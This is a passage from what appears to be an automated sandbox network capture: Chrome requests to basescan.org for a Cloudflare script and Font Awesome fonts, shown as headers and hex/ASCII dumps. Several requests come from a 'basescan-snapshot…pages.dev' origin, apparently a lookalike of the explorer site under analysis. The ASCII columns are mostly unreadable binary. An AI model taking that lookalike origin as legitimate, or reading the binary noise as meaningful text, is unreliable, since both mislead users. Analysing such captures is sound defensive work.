                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC569INData Raw: 1b cb 0a 59 13 6a 2b 20 15 d7 ac ef 08 b1 6a 6e 88 80 56 38 2e 98 b6 10 ad 36 d8 d0 11 e6 c1 f6 00 0b a2 0a bf 01 37 f3 c2 78 41 b0 3d f7 97 b2 90 8a 80 7a 69 45 ab 1a 79 ba db 60 d7 7d 3e 9e e8 0c d2 d5 10 24 6b 7b 14 1c 01 40 29 98 34 05 43 0b 2b 93 21 7a 53 41 fa 4a bb 5d 7e da 67 a9 93 55 86 79 86 b2 10 b8 b2 61 89 df e8 48 18 54 57 28 2e 5e f3 71 ee 92 a6 30 01 66 5e a1 34 78 02 56 56 31 31 06 3f 5e 34 18 9f 32 88 d4 42 77 52 b3 ad 3b 30 02 78 00 ca 3b 92 00 78 d8 14 79 cf f5 c0 ef 13 72 59 83 73 23 21 4e ff 51 49 4f 22 43 67 4b 06 c7 d2 7c fc 43 2d 37 f2 9a 9e c6 2c f5 b3 4c 0c 03 5c 17 02 3e 72 7e a5 1a 80 9b 3e db 91 b0 28 d6 2a 2d 18 0a 10 a8 b9 c3 61 41 4b 8e 7c 0d 4c 0b b8 d8 b6 06 51 c4 a3 26 cd 7e 8f d6 e9 79 44 81 ed 28 0c 0d 1e 84 4d 87 55
                                                                                                                                                                                                                                              Data Ascii: Yj+ jnV8.67xA=ziEy`}>$k{@)4C+!zSAJ]~gUyaHTW(.^q0f^4xVV11?^42BwR;0x;xyrYs#!NQIO"CgK|C-7,L\>r~>(*-aAK|LQ&~yD(MU


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              105192.168.2.549846104.26.12.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC398OUTGET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC752INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Content-Length: 1239
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 09:13:42 GMT
                                                                                                                                                                                                                                              ETag: "66f525c6-4d7"
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FyEIMlT%2F7sFMlZzNPBZep16Jvm4KjC5ajD7sIKCnYRQAkdInoN%2BscDwlcEMIcjwCk9iRfJO9cxoyLUESgS2%2FGrEre%2Fmp1WTTPNqqgapR24BgKvBD5rA8x1Ss%2BeKZ4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2df99f74391-EWR
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              Expires: Mon, 30 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Cache-Control: max-age=172800
                                                                                                                                                                                                                                              Cache-Control: public
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC617INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 74 72 79 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 29 72 65 74 75 72 6e 3b 22 65 72 72 6f 72 22 69 6e 20 63 6f 6e 73 6f 6c 65 3f 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 72 65 74 75 72 6e 20 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 61 20 68 72 65 66 3d 22 27 2b 65 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2b 27 22 3e 3c 2f 61 3e 27 2c 64 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 30 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66
                                                                                                                                                                                                                                              Data Ascii: !function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC622INData Raw: 66 2c 61 2b 6c 2e 6c 65 6e 67 74 68 29 29 7d 63 61 74 63 68 28 69 29 7b 65 28 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 75 29 2c 63 3d 30 3b 63 3c 72 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 74 72 79 7b 76 61 72 20 6f 3d 72 5b 63 5d 2c 61 3d 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 69 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 66 29 3b 69 66 28 69 29 7b 76 61 72 20 6c 3d 6e 28 69 2c 30 29 2c 64 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 6c 29 3b 61 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 64 2c 6f 29 7d 7d 63 61 74 63 68 28 68 29 7b 65 28 68 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e
                                                                                                                                                                                                                                              Data Ascii: f,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              106192.168.2.549851104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC706OUTGET /assets/vendor/font-awesome/webfonts/fa-light-300.woff HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                              Referer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC815INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: application/font-woff
                                                                                                                                                                                                                                              Content-Length: 252876
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Mon, 17 Aug 2020 07:47:00 GMT
                                                                                                                                                                                                                                              ETag: "072d6966a74d61:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 59658
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MReRsl76Z%2BPTmUY%2BZHo4RUWlDYPIrNVaxtjizW2fiA7fd%2Bb8AI6%2BYNw6CSFHvlJxBhp5y5FsDBIlnFZNSAfeSYFqtuU0Ce1z%2BqhxwsXe%2FeI6VJWn8%2FVTCbSVqlNYKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2dfbba84297-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC554INData Raw: 77 4f 46 46 00 01 00 00 00 03 db cc 00 0d 00 00 00 07 8d d4 01 4b 02 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 46 54 4d 00 00 01 30 00 00 00 1c 00 00 00 1c 8e a8 39 fb 47 44 45 46 00 00 01 4c 00 00 00 1e 00 00 00 1e 00 2a 07 43 4f 53 2f 32 00 00 01 6c 00 00 00 4b 00 00 00 60 41 2a 54 df 63 6d 61 70 00 00 01 b8 00 00 04 58 00 00 08 86 25 d8 2b 17 67 61 73 70 00 00 06 10 00 00 00 08 00 00 00 08 ff ff 00 03 67 6c 79 66 00 00 06 18 00 03 85 da 00 06 e4 a4 b1 76 ff 09 68 65 61 64 00 03 8b f4 00 00 00 36 00 00 00 36 18 31 56 94 68 68 65 61 00 03 8c 2c 00 00 00 21 00 00 00 24 04 4e 09 5d 68 6d 74 78 00 03 8c 50 00 00 06 d5 00 00 1c f2 8b 29 07 e0 6c 6f 63 61 00 03 93 28 00 00 13 24 00 00 1c f8 16 69 89 70 6d 61 78 70 00 03 a6 4c 00 00 00
                                                                                                                                                                                                                                              Data Ascii: wOFFKFFTM09GDEFL*COS/2lK`A*TcmapX%+gaspglyfvhead661Vhhea,!$N]hmtxP)loca($ipmaxpL
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: ac b0 45 e2 3d 29 9a ed 38 91 15 61 49 76 56 50 02 b5 22 a0 0e d4 89 ba 50 2a a5 51 3a bd 4a 99 94 45 e3 e8 43 9a 4d 5f 50 0e 2d a0 45 b4 98 96 d2 4a 5a 45 6b e9 07 2a a2 62 aa a2 1a aa a3 7a ba 42 77 c8 a5 26 6e c7 c0 29 9c ca 69 dc 9d 7b 72 5f 1e c8 e9 3c 84 33 79 0c 8f e3 09 3c 9d e7 f2 7c 5e ce 2b f9 3b 5e cd 05 5c c4 5b b8 84 f7 70 39 57 f1 ef 7c 8e eb f8 1a 37 b2 c7 4d 12 91 64 69 27 69 f2 bc bc 28 03 64 98 64 ca 58 99 2c d3 64 a6 2c 92 5c 59 26 2b 65 8d ac 95 8d f2 93 ec 90 5d b2 47 4a e5 a0 54 49 ad 5c 90 3b d2 a4 9f d4 69 ba a7 4e d7 99 3a 4b 8f d5 93 f4 34 3d 5b cf d1 f3 f4 42 9d a7 f3 f5 7a bd 49 97 e8 7d fa a0 2e d3 e5 fa b8 ae d1 75 ba 5e 5f d5 b7 b5 68 57 ff e5 46 dc a8 1b 73 bb bb 3d dc d7 dd 91 ee db ee 68 f7 a4 7b d9 b4 31 4b 4d 81 d9 60
                                                                                                                                                                                                                                              Data Ascii: E=)8aIvVP"P*Q:JECM_P-EJZEk*bzBw&n)i{r_<3y<|^+;^\[p9W|7Mdi'i(ddX,d,\Y&+e]GJTI\;iN:K4=[BzI}.u^_hWFs=h{1KM`
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: f1 1b af be e6 be fb 3e 7d 5f 5d 15 f8 9f 3c 7e ec d8 e3 c7 06 64 4c 59 e0 05 b5 0e f1 f7 5d 73 f5 46 be ff 18 a6 40 19 cb bf 58 5e 62 39 f2 31 c6 60 f2 d0 fe 34 81 42 06 a0 94 5a 7d 96 44 fb 09 5c ad da 74 b1 4c c4 00 c1 ab 24 9a fd 84 fc c5 b8 38 f2 15 25 ae 3e 3f 22 8e a7 af d8 14 31 cd c2 1d c9 fe 42 7c d3 88 7f 64 44 1f de 14 2f f4 3f 4f 1e 2a dd 3f f2 a2 aa be 38 72 7f 29 2e f7 45 23 91 a2 f2 3f 32 47 f2 11 d6 0c 8c 8e 06 22 5c 24 7f 43 ff 8b 0c 6d 67 00 da 39 49 9e 67 62 cc 80 5b 07 2b 0a 4d 95 c4 c2 66 02 a3 bd 99 ad 4d f5 b3 f5 71 8c 97 ea 16 1b 34 35 fd 78 1f 97 09 3d fc 70 28 c3 f5 1d d7 35 f3 f1 2d 4a 49 d9 12 7b fb 47 77 ef fe e8 db 93 8f 3f 4e 4c b6 a0 1f 7b dc b0 94 6d db d4 98 f1 f8 31 bd c0 46 cf 84 c3 67 9e 7a ab f5 be f7 59 6f fd c8 de
                                                                                                                                                                                                                                              Data Ascii: >}_]<~dLY]sF@X^b91`4BZ}D\tL$8%>?"1B|dD/?O*?8r).E#?2G"\$Cmg9Igb[+MfMq45x=p(5-JI{Gw?NL{m1FgzYo
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: a3 a0 04 0c 45 1f 99 09 ab 86 16 d3 8c 4b 27 9f 1e 18 4e 24 92 89 c4 f0 40 22 ac 2b 35 9e af 29 7a 38 b1 3a 32 10 fa ef 14 73 df 56 c0 42 1d d4 9d 01 b8 99 01 b8 59 61 b6 61 3f 47 a0 bb 60 52 8e 13 ba ee e9 8a 6f 87 24 9a 50 a8 4e 3b 90 ab 8a d3 32 45 b8 6a 11 a8 5f 07 1c a4 d9 14 61 53 1c ab b2 b0 78 86 14 69 41 52 1a f4 3a c4 72 3c c4 72 3f 54 a2 ca a3 a2 29 66 16 17 9b 8a d4 e4 44 9e fb 1e c7 71 ac 9f 63 b3 ff 22 aa 90 77 41 54 55 f1 5f b2 2c e7 67 21 e1 59 49 3a 55 11 c5 2b ed 7f f9 c5 c3 0f ff 02 3e c4 0a 22 b7 00 6b 9c 91 97 5f 84 b5 f4 34 40 7e 03 e6 2f 13 76 c7 4d a0 84 90 b3 8c e8 1a 77 2a 49 21 e6 07 ff e2 b1 c7 fe e2 31 72 1e d7 0d fe bd ff 6a 41 d3 b5 9d 8a 24 4b e4 e9 c7 30 f1 98 93 f0 20 d9 c0 89 8b 9a f6 f8 b4 a4 68 94 c4 11 01 86 33 ec 56
                                                                                                                                                                                                                                              Data Ascii: EK'N$@"+5)z8:2sVBYaa?G`Ro$PN;2Ej_aSxiAR:r<r?T)fDqc"wATU_,g!YI:U+>"k_4@~/vMw*I!1rjA$K0 h3V
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 35 44 bf c0 8b 96 25 f2 82 ff ad 46 20 60 b4 cb 56 a0 e8 5f 88 46 cc 6f 66 15 8e d7 fc ac af ec 63 fd 1a ff a0 c3 51 7b b5 b1 3f 43 2b 23 50 39 53 83 7c dd ad cb 76 e6 3a 5a 1f 40 a9 bf 6c 7d dc ca 17 a9 d8 88 52 d8 65 9c 79 5e 83 66 61 15 d0 4f 58 51 5a 75 20 ac 2e 59 77 92 18 df 91 3f b0 33 20 71 bc b8 f9 8a ec ec 30 90 32 d2 ee 89 21 d1 2f 72 e2 40 b1 38 00 37 bf 38 64 43 13 e3 31 43 bc 6c 13 c9 6c df be 9b aa f3 ef ce cb 01 c1 cf 0d dc bb 73 fc da 1d 51 ce 2f 04 5e ba e5 60 8c e3 34 3f 67 ec d8 bf c3 e0 fc 1a c7 c5 18 0d e7 2b ac f3 45 18 25 09 68 f8 0e b7 8e b4 7c 05 e5 44 9b 48 05 59 dc 6a bd 12 01 f6 3b 17 21 55 e7 b9 08 cf d9 5c b5 02 c9 b9 7c 85 b2 ee f0 14 c1 ff 39 4c 6b 2d 2e 34 5b 70 b1 97 30 d4 68 10 58 de 76 0b ee cd cc 42 26 d3 6c 64 32 f0
                                                                                                                                                                                                                                              Data Ascii: 5D%F `V_FofcQ{?C+#P9S|v:Z@l}Rey^faOXQZu .Yw?3 q02!/r@878dC1CllsQ/^`4?g+E%h|DHYj;!U\|9Lk-.4[p0hXvB&ld2
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: bd 37 e6 e2 75 70 25 90 ab ea d0 96 4c 76 d5 01 66 1f 16 39 ef 16 39 df fb 78 e9 1a fc 9f e8 83 a7 dd 36 07 dd 12 cf ad 78 be 6c 1f c0 fc ba 00 f3 eb 3f 53 87 2f 74 95 bd d6 fd 72 75 10 99 d8 f2 cf 00 2e 3f 42 f9 66 6f 4f 8f 31 3a 8c 0e 9d a3 d6 65 9e 85 8b d4 bb 3b fe 30 c2 dc 89 8b 5d 08 00 14 fb 9c 3b 7e dd f7 47 3a b9 16 d7 0c c6 dc 95 db 70 ee 8b 5d 6d f3 c6 d8 0f b4 69 92 29 31 d3 88 77 ea 45 ba 60 9d 16 0c 14 25 eb 92 9d ee 4e bc 6e 51 f9 9b 9a 82 d0 e4 01 e9 e9 ca ba 75 38 0b 57 f6 fc 05 ef 77 08 b2 f1 4d 81 b2 c8 9f 84 bc ca 25 47 a3 53 df 00 13 06 a8 39 0c 18 7f 0e c6 a2 1b e6 00 02 b4 ea c5 fc bf b3 c6 09 5a 63 00 2a 4e 95 9f bc 44 95 c9 48 6f 9d 3f 70 e9 09 d4 91 9d a5 7a b4 15 5c 89 72 37 75 96 02 ee 8b 73 08 21 9d 78 48 bf 1e 92 22 16 9b f1
                                                                                                                                                                                                                                              Data Ascii: 7up%Lvf99x6xl?S/tru.?BfoO1:e;0];~G:p]mi)1wE`%NnQu8WwM%GS9Zc*NDHo?pz\r7us!xH"
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 49 b4 2f 1c 19 62 80 c2 c8 cb e0 c1 ee 9d 01 64 93 3a 9f 22 8b dd 5b 15 f6 49 fa 79 27 dd e3 fd 5e 63 59 77 7c 91 ff 63 ea 94 84 a1 e5 f4 93 62 28 9f 46 dd bd ce f3 ab ed 41 25 2f c9 82 20 bb 0f 7f e3 0e 28 69 c0 3c 7a fa c3 76 eb 8b 62 d8 10 dd 18 1c 62 bb e5 c1 e4 9e b9 4d 5c 3d 85 4d 4e 29 b8 91 ed 16 55 c5 0b dd af 12 72 c0 71 56 ad 6a 11 e6 36 79 75 cd c9 6d 5f 70 26 f7 43 88 b9 e9 ec 86 92 e9 ec a6 15 ea 9e dd 76 8b ce 6e a7 3e 2b d6 f1 8a da 38 15 a1 75 90 68 e1 77 af 5a c8 b0 8c ec c3 ed 95 4c ba 56 32 8a 26 01 ef ff 14 c6 f1 9b 30 f7 7c 54 0a 88 3a 82 51 3a 8e 0e 47 4d 37 c2 01 cb 8b d1 8a d0 b5 4b 8b 70 5f ca 76 36 2c 71 1b 88 7c 36 d2 d7 6f 2f f6 f7 45 ce e9 c3 fa 7b 54 45 3a 27 e8 c2 39 49 51 c9 d9 ee 31 9e e8 9a 47 e7 ad 75 eb ac 56 30 78 c1
                                                                                                                                                                                                                                              Data Ascii: I/bd:"[Iy'^cYw|cb(FA%/ (i<zvbbM\=MN)UrqVj6yum_p&Cvn>+8uhwZLV2&0|T:Q:GM7Kp_v6,q|6o/E{TE:'9IQ1GuV0x
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 3d 05 33 aa f5 15 31 51 be 44 b7 a0 06 c4 a2 a3 06 03 8b d6 c0 bd 8d 68 a5 5e a5 9b cf 42 28 17 42 65 04 54 01 73 4c 02 50 66 a6 48 41 87 ba 0c 4a 4a d2 2c 06 46 d3 fd 28 f1 ea 4f 8f 06 de cf 1e 09 f5 f5 85 cc dc c7 f1 76 84 cd e5 e2 a8 82 7f 16 b8 0e a6 b1 84 2a f9 19 45 3a 4b 26 80 29 92 14 47 7b 0e 58 22 33 19 8d 67 c7 51 8a 33 9e 8d 47 79 3e 59 4a 0e 0c c0 85 5f 3f 60 37 17 e1 e5 56 53 91 e6 5b b8 cf 1b 3c bb a8 7c 61 5e 52 9a 0c 4b e5 67 8e ac 64 0b ca ce a8 be 08 aa b0 e9 bc a4 13 54 55 62 eb 05 67 65 d7 90 5c e0 50 8f a4 48 95 3a 11 0c 61 57 a0 70 47 42 0d 37 76 20 fd 81 b7 a9 6a ed 0d b1 70 bf a1 0b c0 3e f8 05 96 f7 d7 06 d4 93 f3 f3 e3 57 c5 04 45 fd f1 6d ef 0a a6 0e 8e cf cf 1d 15 6e 79 17 92 c9 bf 72 d4 bc 72 5c 26 9f 9f db f7 f0 17 15 52 2f
                                                                                                                                                                                                                                              Data Ascii: =31QDh^B(BeTsLPfHAJJ,F(Ov*E:K&)G{X"3gQ3Gy>YJ_?`7VS[<|a^RKgdTUbge\PH:aWpGB7v jp>WEmnyrr\&R/
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: aa b9 6a 65 ba d8 36 bb 8a 52 19 53 0d 20 66 a5 2a 14 90 2c 40 a3 9e 01 b4 e2 81 ee 36 25 13 0d 76 ac e8 14 da f2 d4 6b c5 0a 70 e9 e4 ee db 02 91 7d 77 bf e3 ee ab 10 96 45 02 f0 34 b1 65 3c 62 3f 47 8e 91 79 72 2c 17 8c 44 ca 66 34 98 3b 46 0c 23 9b 29 96 f6 15 8b 99 6c d8 b8 ed 18 b9 8d 2c 46 02 7f ba eb ee 0d 1b ee de 65 8e 65 ca e5 40 24 12 f8 f4 58 a5 32 f6 e9 40 64 70 73 ea c8 b3 91 b1 89 8d f9 10 aa 0b 86 f2 1b 27 c6 22 e5 52 3e 95 0c c0 bf 64 2a 5f 3a 3b 32 89 fc 0d b3 05 f8 a5 cd 28 6f ea e1 97 56 30 4a 28 5e da bf 42 fe e4 f0 47 cc 04 bc 5f c6 f7 49 37 7f b4 92 31 7a 01 3e 40 52 b2 c3 16 e1 b6 00 7c 51 81 b1 7d 7d f9 87 ec 19 f2 01 26 89 38 bd 6b c7 23 44 d5 4c 5c 1d 37 47 dd df 8a ba 30 60 e5 ae 47 08 68 91 77 dc 2c cb f0 13 65 65 db eb 02 80
                                                                                                                                                                                                                                              Data Ascii: je6RS f*,@6%vkp}wE4e<b?Gyr,Df4;F#)l,Fee@$X2@dps'"R>d*_:;2(oV0J(^BG_I71z>@R|Q}}&8k#DL\7G0`Ghw,ee
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: ed bf eb 97 fd 41 45 37 4b c9 b0 0a d4 5f 50 0d 4f 15 74 25 a8 29 fd 26 ef f3 41 3b 9c f4 d2 64 08 93 c3 4a b0 50 71 92 a1 9d 98 1e 90 e5 09 e8 1c 29 96 4f c6 b4 78 c2 17 4b e6 63 52 58 e1 c7 79 de 89 4f 0d 3a f1 83 29 1a bf 7e 72 db e4 e4 b6 43 ba a5 47 d2 d0 bb f6 ff e0 f9 a0 28 6a 7e 68 86 e0 53 0c 43 c1 66 84 fc 7e 51 0a 09 84 08 80 18 e3 21 6c 21 4d 12 b0 85 9a 28 4c b9 6d 51 7c d0 16 59 c6 b6 10 60 cf b1 dd b2 13 db 69 f7 6e 67 8f 26 9d 30 8c 44 98 e1 00 86 7c 9f dd 4e 69 ec 1a 73 a5 b3 b3 eb 10 f3 b0 8c 28 4d 5f ab 7b 62 38 ea c6 20 cd e6 1d 78 d8 cd 0a 08 51 0b 97 0b 0a 1f a8 f8 84 8a a8 36 13 76 bd aa 05 b6 6c 4c f5 37 6e 8b e9 fa 86 b9 80 a6 46 42 a3 f7 5d 03 8f 7b de 34 2a 19 3e fb a6 78 62 37 75 cf 13 52 b5 70 79 d8 47 c6 87 cb 61 4d 0d 0d 5c
                                                                                                                                                                                                                                              Data Ascii: AE7K_POt%)&A;dJPq)OxKcRXyO:)~rCG(j~hSCf~Q!l!M(LmQ|Y`ing&0D|Nis(M_{b8 xQ6vlL7nFB]{4*>xb7uRpyGaM\


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              107192.168.2.549848104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC707OUTGET /assets/vendor/font-awesome/webfonts/fa-brands-400.woff HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                              Referer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC937INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: application/font-woff
                                                                                                                                                                                                                                              Content-Length: 89824
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Mon, 17 Aug 2020 07:47:00 GMT
                                                                                                                                                                                                                                              ETag: "072d6966a74d61:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B0drtj5ofOsCoL3bU1lROoJb61FQBLL0ugNQpGWMW2JT1z4nC5qhwSVqVyDMQ%2BJn41HY%2FOT7uFPPdbx%2FATYUyMt00of04V2qm4swVNA0ajGQyDOXF6lytVHzNa8bJA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Set-Cookie: __cflb=0H28vtoAdHDLg8sTeQQMiRCFaG8m9Kq73Z1Zb26nxX6; SameSite=None; Secure; path=/; expires=Sun, 29-Sep-24 00:16:07 GMT; HttpOnly
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2dfb9ad4375-EWR
